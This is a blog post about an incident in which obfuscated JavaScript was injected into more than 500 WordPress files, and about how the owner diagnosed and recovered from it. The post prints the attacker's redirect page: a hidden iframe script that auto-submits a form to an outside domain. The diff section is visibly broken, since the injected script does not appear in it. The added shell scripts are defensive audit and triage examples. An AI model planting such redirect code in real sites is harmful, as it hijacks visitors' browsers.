
How my WordPress JS got tampered with. Seeking information => Solved, thanks to everyone.

(Update 2019/02/24)
@prograti commented right after this article was published, and the attack method has been identified. Thank you very much.
The attacker exploited a vulnerability in the WordPress plugin Duplicator, v1.2.40 and earlier.
I plan to write up the details in a separate article.

(Update 2019/02/26) Part 2
How my WordPress JS got tampered with, part 2: "Sharing the details of the attack method". Misuse: no. Absolutely not.

(Update 2019/03/16) Part 3
How my WordPress JS got tampered with, part 3: "Preventing a recurrence" (final)


Hi, @koshi_life here.

This is the story.

TL;DR

  • I had the WordPress public directory writable by the web server account, and more than 500 JS files got tampered with.
  • After loading the WordPress site, visitors were redirected in two hops to an English-language site. Does anyone recognise this? If you know a countermeasure, please tell me.
  • When you have been tampered with, first take a diff of the assets before and after the tampering; it pinpoints the modified spots, so recovery and interim measures go much faster.

[Image: 事象.png, the observed symptom]

Foreword

As of posting (2019/02/23) I do not know how the tampering was done and have no root-cause fix in place,
so if anyone has any information, I would be very grateful for a comment.

This was the first time I had been cracked, and looking back there are things I could have investigated from the start that would have let me recover much sooner.

I would rather not do incident response at all, but I cannot say I will never run into an unavoidable situation,
so I want to write up, based on what I noticed, how to deal with tampering.

Environment

  • WordPress v5.0.3

Symptom: accessing the WordPress site redirects you in two hops to an English-language site

About 3 seconds after loading the site URL, the browser was redirected to a blank page.
About 1 second after that, it was redirected again to an English-language site,
leaving the site unable to provide any of its normal functionality.

[Image: 事象.png, the observed symptom (shown again)]

The first and second redirect destinations were random, but sometimes they landed on the same URL.

The URL and contents actually served at the first redirect destination

  • URL
    • duelsouhait.tk/index/?4831537102803
  • Contents (HTML)
<script>
function go() {
  window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="http://mashina.com/mblog/latestpost"></form>';
  window.frames[0].document.forms[0].submit();
}
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>

The JS waits 99 ms after the hidden iframe loads, then writes a form into the iframe and submits it (a POST) into the parent window; that submission is the second redirect.

URLs actually served at the second redirect destination (partial)

We were sent to random blog posts.

Direct cause

Comparing the HTML returned by the WordPress top page before and after the tampering,
the header contained an unfamiliar, suspicious, obfuscated piece of JS.

The actual diff and the JS

$ diff before.html after.html
6c6
---
> <head>
71c71
---
> </head>

When I grepped the tampered WordPress public directory for this distinctive variable name _0x4c2c and deduplicated by file path, 540 JS and PHP files turned out to be contaminated.

  • js: 533 files
    • js files under wp-admin/js
    • js files under wp-content
    • js files under wp-includes/js
  • wp-content/themes/*/header.php: 5 files
  • wp-includes/theme-compat/header.php: 1 file
  • wp-includes/theme-compat/header-embed.php: 1 file

For reference, I have published the list of contaminated files.
Gist: contaminated file list

Recovery and interim measures

Here is what I did for recovery and as interim measures.

Recovery

Since a large number of assets had been contaminated, I did not fix them by hand: I redeployed from the latest state of the master branch and, suspecting the DB might have been contaminated as well, restored the DB contents from a dump taken at a point when the site was confirmed to be working normally.

After this release I cleared the browser cache and checked the site,
and confirmed that the redirect no longer occurred.

Interim measures

Since I could not pin down how the tampering was done, I formed a hypothesis and acted on it.

  • Hypothesis
    • Nearly all JS under the public directory had been tampered with, and similar obfuscated code had been planted in each file, so the assets were most likely modified over web access through some WordPress vulnerability.
  • Countermeasure
    • Changed the owner of the WordPress public directory from the nginx user to a regular user, so that it can no longer be modified through web access (the web server is nginx).
  • Side effect
    • Plugins can no longer be updated from the WP admin screen, which is inconvenient.

The incident has not recurred since this change.
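The ownership change above, turned into a repeatable check. This is an added example, not the article's own script: it lists the paths a web server process could rewrite under a docroot (the weak state described above), then applies the fix of handing the tree to a deploy account with the web server only reading it. WEB_USER, DEPLOY_USER and the sample tree are constructed placeholders.

```shell
#!/bin/sh
# Added example, not the article's own script: audit a WordPress docroot for
# paths the web server process could rewrite, then apply the article's fix
# (tree owned by a deploy account, web server read-only). WEB_USER,
# DEPLOY_USER and the sample tree below are constructed placeholders.
umask 022
WEB_USER="${WEB_USER:-wp-example-nginx}"        # constructed web server account
DEPLOY_USER="${DEPLOY_USER:-wp-example-deploy}" # constructed deploy account

# Build a constructed mini docroot in a temp dir, in the weak state:
# directories and files writable by anyone, so the web server can edit them.
make_weak_docroot() {
  root=$(mktemp -d)
  mkdir -p "$root/wp-admin/js" "$root/wp-includes/js" "$root/wp-content/plugins/p"
  printf 'jQuery(function(){});\n' > "$root/wp-admin/js/common.js"
  printf 'var wp = {};\n'          > "$root/wp-includes/js/wp.js"
  printf '<?php // plugin\n'       > "$root/wp-content/plugins/p/p.php"
  chmod 777 "$root/wp-admin/js" "$root/wp-includes/js" "$root/wp-content/plugins/p"
  chmod 666 "$root/wp-admin/js/common.js" "$root/wp-includes/js/wp.js" \
            "$root/wp-content/plugins/p/p.php"
  printf '%s\n' "$root"
}

# Paths the web server could modify: owned by WEB_USER with the owner-write
# bit set, or group-/world-writable. The -user clause is only used when the
# account exists on this host, because find errors out on an unknown user.
list_web_writable() {
  if id "$WEB_USER" >/dev/null 2>&1; then
    find "$1" \( \( -user "$WEB_USER" -perm -0200 \) -o -perm -0020 -o -perm -0002 \) -print
  else
    find "$1" \( -perm -0020 -o -perm -0002 \) -print
  fi
}

count_web_writable() { list_web_writable "$1" | wc -l | tr -d ' '; }

# The fix: directories 755, files 644, tree owned by the deploy account with
# the web server's group for read access. chown needs root and existing
# accounts, so it is printed instead of run when those are missing.
harden_docroot() {
  find "$1" -type d -exec chmod 755 {} +
  find "$1" -type f -exec chmod 644 {} +
  if [ "$(id -u)" -eq 0 ] && id "$DEPLOY_USER" >/dev/null 2>&1 \
     && id "$WEB_USER" >/dev/null 2>&1; then
    chown -R "$DEPLOY_USER:$WEB_USER" "$1"
  else
    echo "not root or accounts missing; run as root: chown -R $DEPLOY_USER:$WEB_USER $1" >&2
  fi
}

ROOT=$(make_weak_docroot)
echo "web-writable paths before hardening: $(count_web_writable "$ROOT")"
list_web_writable "$ROOT"
harden_docroot "$ROOT"
echo "web-writable paths after hardening:  $(count_web_writable "$ROOT")"
```

Run `list_web_writable /path/to/public_html` on a real docroot with WEB_USER set to the account nginx or php-fpm runs as; any path it prints is one a compromised web process could rewrite, which is exactly what let 540 files be changed here.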

Looking back at the investigation steps

This time, investigation, root-cause identification, recovery and interim measures took about half a day in total.

Identifying the tampered source locations and their extent took the longest; in hindsight, taking a diff of the assets before and after the tampering would have let me recover much faster.

If the assets are under git: git diff

We deployed with AWS CodeDeploy, so the live assets were not under git,
and at the time I could not run git diff in my environment; but had they been under git,
a git diff would have made the tampered spots obvious at a glance.

Going forward, I am considering running git init and git commit after each CodeDeploy automatic deployment so that the live tree is under git.

If the assets are not under git: diff the HTML

This is the method I used in this incident to identify the cause and extent of the redirect.

Take a diff of the rendered HTML from before and after the tampering.
The staging environment was working normally, so I compared the staging response against the tampered production response.

Once the tampered JS was identified, I grepped for a distinctive string from it to find out whether other files had been tampered with and to estimate the extent. Example command (`-l` lists each matching file once; `-print0` and `-0` keep paths with spaces intact):

$ find ./public_html -type f -print0 | xargs -0 grep -l '<distinctive string>' > ~/duty_list.txt
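The same triage end to end, as an added example that is not the article's own commands: diff the known-good rendered HTML against the tampered one, pull the obfuscated script's array name out of the added lines as a grep marker, then list and tally the contaminated files under a docroot. The two captures, the marker `_0xdead` and the file tree are all constructed.

```shell
#!/bin/sh
# Added example, not the article's own commands. The captures, the marker
# _0xdead and the docroot below are constructed so the script runs offline.
WORK=$(mktemp -d)

# Constructed captures of "/" from staging (before) and production (after).
cat > "$WORK/before.html" <<'EOF'
<!DOCTYPE html>
<html>
<head>
<title>Site</title>
</head>
<body><p>hello</p></body>
</html>
EOF
cat > "$WORK/after.html" <<'EOF'
<!DOCTYPE html>
<html>
<head><script type="text/javascript">var _0xdead=["\x61\x62\x63"];(function(){})();</script>
<title>Site</title>
</head>
<body><p>hello</p></body>
</html>
EOF

# 1. Lines present only in the tampered response (diff's "> " side).
injected_lines() { diff "$1" "$2" | sed -n 's/^> //p'; }

# 2. Marker: the obfuscator's string-array name (the article's was _0x4c2c).
#    Any string unique to the injected code works; this one is short and
#    does not occur in legitimate WordPress files.
extract_marker() {
  injected_lines "$1" "$2" | grep -o 'var _0x[0-9a-f]*=\[' | head -n 1 \
    | sed 's/^var //; s/=\[$//'
}

# 3. Files under the docroot containing the marker, NUL-safe for odd names;
#    -F treats the marker as a fixed string, -l prints each path once.
contaminated_files() { find "$1" -type f -print0 | xargs -0 grep -l -F -- "$2" | sort; }

# 4. Tally by top-level directory, the way the article reported its 540 hits
#    (wp-admin/js, wp-content, wp-includes/js, theme header.php ...).
tally_by_topdir() {
  contaminated_files "$1" "$2" | sed "s|^$1/||" | cut -d/ -f1 | sort | uniq -c | sed 's/^ *//'
}

# Constructed docroot: three contaminated files, one clean one.
DOCROOT="$WORK/public_html"
mkdir -p "$DOCROOT/wp-admin/js" "$DOCROOT/wp-includes/js" "$DOCROOT/wp-content/themes/t"
INJ='var _0xdead=["\x61\x62\x63"];(function(){})();'
printf '%s\njQuery(function(){});\n' "$INJ" > "$DOCROOT/wp-admin/js/common.js"
printf '%s\nvar wp = {};\n' "$INJ"          > "$DOCROOT/wp-includes/js/wp.js"
printf 'var clean = 1;\n'                   > "$DOCROOT/wp-includes/js/clean.js"
printf '<head><script>%s</script>\n' "$INJ" > "$DOCROOT/wp-content/themes/t/header.php"

MARKER=$(extract_marker "$WORK/before.html" "$WORK/after.html")
echo "marker: $MARKER"
echo "contaminated files:"
contaminated_files "$DOCROOT" "$MARKER"
echo "per top-level directory:"
tally_by_topdir "$DOCROOT" "$MARKER"
```

On a real incident, replace the two captures with `curl -s` output from staging and production and point `contaminated_files` at the live docroot; the per-directory tally tells you immediately whether one plugin or the whole tree is affected.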

What was wasted in the investigation

Forming the hypothesis from the symptom that JS was the culprit was probably right.
After that, I tried to work out how the tampering had been done before considering recovery and countermeasures, and that order of thinking was wrong. It would have been more efficient to take the diff described above first, based on facts, and then narrow down the scope.

  • Speculation about how the tampering happened
    • 1. Someone broke into the server and tampered with the files.
    • 2. The WP admin password was cracked and the tampering was done through the admin screen.
    • 3. The upstream source of a WP plugin in use was already contaminated, and a plugin update spread it.
    • 4. Something else.

1: if the bastion host's key had leaked, other servers would have been affected too, so I judged this unlikely.
2: restoring the DB snapshot changed nothing, so I judged this unlikely.
3: I suspected this one and wasted time on it. I removed plugins from wp-content/plugins one at a time, reloading the site after each to hunt for the culprit, but since nearly every plugin's JS was contaminated, the whole process was wasted.

What advance preparation saved me

  • Having backups (DB, everything under wp-content, source).
  • Having a staging environment confirmed to be working normally.

Afterword

Incident response arrives without warning.

Outage response is exhausting too, but facing an invisible, malicious attacker stirs up something like anger,
and compared with an outage where the fault is directly our own, the meaning of the work feels distorted for the person handling it; it was mentally more draining than an ordinary outage.

We who run a vulnerable system are at fault, so I want to build more robust systems. I am sorry for the trouble caused to everyone involved, but in a sense it was a valuable experience.

If you have any information about this incident, I would appreciate a comment.
